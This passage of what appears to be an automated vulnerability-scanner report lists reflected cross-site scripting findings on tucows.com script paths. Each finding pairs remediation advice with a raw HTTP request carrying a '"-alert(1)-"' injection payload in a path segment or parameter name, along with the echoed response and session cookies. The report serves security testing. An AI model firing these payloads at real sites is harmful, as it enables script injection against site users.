
Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d53eb"-alert(1)-"62bf072695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.276. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c81a"-alert(1)-"2b1a48bb558 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.277. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8017"-alert(1)-"b67c8ffcb4e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.278. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6806a"-alert(1)-"96913118ea0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.279. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12dab"-alert(1)-"167442f74b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.280. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e30d"-alert(1)-"7ba0537e045 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.281. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189cd"-alert(1)-"ae1dffd01f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.282. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1d9"-alert(1)-"aaec46b7783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.283. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d85f"-alert(1)-"b501c96f23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.284. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a50d"-alert(1)-"addf45cb35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.285. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77ea"-alert(1)-"c2c5c57e4b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
